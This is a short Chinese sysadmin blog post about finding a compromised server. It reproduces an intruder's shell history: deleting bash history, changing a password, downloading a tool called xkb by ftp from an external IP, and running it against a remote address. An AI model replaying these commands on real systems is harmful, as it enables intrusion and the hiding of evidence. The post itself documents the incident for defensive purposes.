今天系统ldap部分要增加一个节点，刚要开始执行，发现操作系统用户进不去了，怪了，已经是第二次被人家修改密码了。问了下知道这个密码的三个人，都没有动过。因此怀疑被黑了，查看了下历史记录：
    1  rm ~/.bash_history
    2  ls
    3  passwd
    4  cd /var/tmp
    5  ls
    6  uname -na
    7  ls
    8  ftp 71.18.107.183
    9  chmod +x xkb
   10  ./xkb 60.53.227.73:0
   11  uanem -na
   12  uname -na
   13  cd /var/tmp
   14  ls
   15  ./xkb 60.53.227.73:0
发现出现了一些不正常的登录信息，而且在此之前的信息都被rm掉了。肯定有问题了，ping了下sina，结果是通的。晕倒，原来这个机器一直在公网上裸奔啊！太危险了，查了下两个ip地址，发现第一个的归属地属于American，称为ARIN；第二个是马来西亚的，具体就不知道了；还好这次是普通用户密码，如果是root（我们限制了root不能以ssh登录），那就相当于把服务器送给他了，sunv890啊！